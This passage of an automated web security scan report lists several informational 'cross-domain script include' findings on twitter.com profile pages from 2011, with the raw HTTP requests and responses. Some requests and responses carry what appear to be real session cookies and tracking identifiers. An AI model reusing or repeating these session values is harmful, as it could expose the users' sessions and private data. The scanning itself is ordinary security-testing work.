User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:26:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664017-69884-52170
ETag: "ad693cd2a604baf3cbf6a8946c819481"
Last-Modified: Wed, 02 Feb 2011 16:26:57 GMT
X-Runtime: 0.01067
Content-Type: text/html; charset=utf-8
Content-Length: 35828
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.296. http://twitter.com/cloudscan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/cloudscan

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186
http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /cloudscan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570769-80688-30975
ETag: "f6d6928da3cefbfd657cd1e00ee32f98"
Last-Modified: Tue, 01 Feb 2011 14:32:49 GMT
X-Runtime: 0.01580
Content-Type: text/html; charset=utf-8
Content-Length: 36105
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570766765958; path=/; expires=Tue, 08-Feb-11 14:32:46 GMT; domain=.twitter.com
Set-Cookie: guest_id=12965707698208199; path=/; expires=Thu, 03 Mar 2011 14:32:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTMwNTIyZTg1YmY2Njc3ZmZiYjAyZmEyMGViOWMyOTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIneGj4S0B--2358db729323d545c46cdb0ecb8b26170a259191; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186" type="text/javascript"></script>
...[SNIP]...

18.297. http://twitter.com/coolmompicks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/coolmompicks

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664284-31611-15051
ETag: "2e9cb50b86de201e0801577f336f15e5"
Last-Modified: Wed, 02 Feb 2011 16:31:24 GMT
X-Runtime: 0.01639
Content-Type: text/html; charset=utf-8
Content-Length: 48509
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.298. http://twitter.com/davidgregory previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/davidgregory

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664280-64037-24845
ETag: "8a07a7c7c39bf91acec811b53e8bd6e1"
Last-Modified: Wed, 02 Feb 2011 16:31:20 GMT
X-Runtime: 0.01500
Content-Type: text/html; charset=utf-8
Content-Length: 53701
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.299. http://twitter.com/designmilk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/designmilk

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664273-87114-28419
ETag: "9d887142551ffc970560f3437cf85064"
Last-Modified: Wed, 02 Feb 2011 16:31:13 GMT
X-Runtime: 0.01035
Content-Type: text/html; charset=utf-8
Content-Length: 51007
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.300. http://twitter.com/donlomb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/donlomb

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186
http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /donlomb HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570775-73415-59612
ETag: "ac15b4f3ef758ea8b83677d83e987f43"
Last-Modified: Tue, 01 Feb 2011 14:32:55 GMT
X-Runtime: 0.00802
Content-Type: text/html; charset=utf-8
Content-Length: 50405
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570772308394; path=/; expires=Tue, 08-Feb-11 14:32:52 GMT; domain=.twitter.com
Set-Cookie: guest_id=12965707752439485; path=/; expires=Thu, 03 Mar 2011 14:32:55 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWIwYjRkNGZkZWJkMjQyMWVkNmJkZTgzMzI3MzdlNjhjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIzPaj4S0B--030bb95a52ee53c76439bbd70cb14ed1d739a3fd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186" type="text/javascript"></script>
...[SNIP]...

18.301. http://twitter.com/donlomb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/donlomb

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /donlomb HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664096-36576-46544
ETag: "4476452788e75a534f8062953992169f"
Last-Modified: Wed, 02 Feb 2011 16:28:16 GMT
X-Runtime: 0.01738
Content-Type: text/html; charset=utf-8
Content-Length: 50464
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.302. http://twitter.com/gamespot previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/gamespot

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664280-74042-40764
ETag: "0edace0d06f2150d9ed1c97df1c5d809"
Last-Modified: Wed, 02 Feb 2011 16:31:20 GMT
X-Runtime: 0.02034
Content-Type: text/html; charset=utf-8
Content-Length: 50198
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.303. http://twitter.com/jasmith579 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jasmith579

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
